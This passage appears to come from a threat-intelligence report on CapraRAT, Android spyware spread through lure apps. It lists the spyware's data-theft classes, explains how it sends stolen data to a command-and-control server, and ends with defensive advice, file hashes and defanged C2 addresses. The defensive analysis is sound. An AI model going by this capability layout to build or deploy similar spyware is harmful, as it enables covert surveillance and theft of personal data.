In all cases, the app still requests gratuitous permissions from the user that hint to the tool’s capabilities. Even if the user declines permissions, the app still runs, meaning the group has not overcome this hurdle to successfully implementing their spyware.

Piya Sharma app install failure dialog on Android 14
Piya Sharma app install failure dialog on Android 14

The new CapraRAT packages also contain a very minimal new class called WebView, which is responsible for maintaining compatibility with older versions of Android via the Android Support Library, which developers can choose to include in a project to enhance compatibility.

Spyware Activities and C2

The app’s MainActivity initiates requests for permissions. The app still runs even if permissions are not granted.

MainActivity calls the TCHPClient class, which contains the malicious capabilities leveraged by CapraRAT. This class drives several spyware classes and methods, including:

  • audioStreamer (aStreamer)
  • CallLogLister
  • CallReceiver
  • ContactsLister
  • DirLister (file browsing)
  • downloadFile
  • killFile (file deletion)
  • killProcess
  • PhotoTaker
  • SMSLister
  • SMSReceiver

These give the spyware fine-grained control over what the user does on the device.

The sendData method is responsible for constructing the data collected by other methods and classes and sending it to the C2. The mRun method constructs the socket and sends the data to the C2 server using the variables specified in the Settings class. Each of the current campaign’s APKs use the same C2 server hostname, IP address and TCP port number 18582. The Settings class also shows the same CapraRAT version identifier for each APK, A.D.0.2.

CapraRAT’s Settings class shows the tool’s configuration variables

mRun performs a connectivity check to decide whether to connect to the C2 using the hostname shareboxs[.]net or the hardcoded IP address 173[.]249[.]50[.]243. This IP address has been tied to Transparent Tribe’s CrimsonRAT and AhMyth Android RAT C2 activity since at least 2022. As of this writing, shareboxs[.]net resolves to 173[.]212[.]206[.]227.

Conclusion

The updates to the CapraRAT code between the September 2023 campaign and the current campaign are minimal, but suggest the developers are focused on making the tool more reliable and stable. The decision to move to newer versions of the Android OS are logical, and likely align with the group’s sustained targeting of individuals in the Indian government or military space, who are unlikely to use devices running older versions of Android, such as Lollipop which was released 8 years ago.

The APK theme updates show the group continues to lean into its social engineering prowess to gain a wider audience of targets who would be interested in the new app lures, such as mobile gamers or weapons enthusiasts.

To help prevent compromise by CapraRAT and similar malware, users should always evaluate the permissions requested by an app to determine if they are necessary. For example, an app that only displays TikTok videos does not need the ability to send SMS messages, make calls, or record the screen. In incident response scenarios, treat the related network indicators of compromise as suspect, including the use of port 18582, and search suspect apps for the presence of strings using the unique method names outlined in the Spyware Activities & C2 section of this report.

Indicators of Compromise

Files

SHA1 Name
28bc3b3d8878be4267ee08f20b7816a6ba23623e TikTok signed.apk
c307f523a1d1aa928fe3db2c6c3ede6902f1084b Crazy Game signed.apk
dba9f88ba548cebfa389972cddf2bec55b71168b Sexy Videos signed.apk
fff24e9f11651e0bdbee7c5cd1034269f40fc424 Weapons signed.apk

Network Indicators

Domain/IP Description
shareboxs[.]net C2 domain
173[.]212[.]206[.]227 Resolved C2 IP address, hosts shareboxs.net
173[.]249[.]50[.]243 Hardcoded failover C2 IP address

❌
❌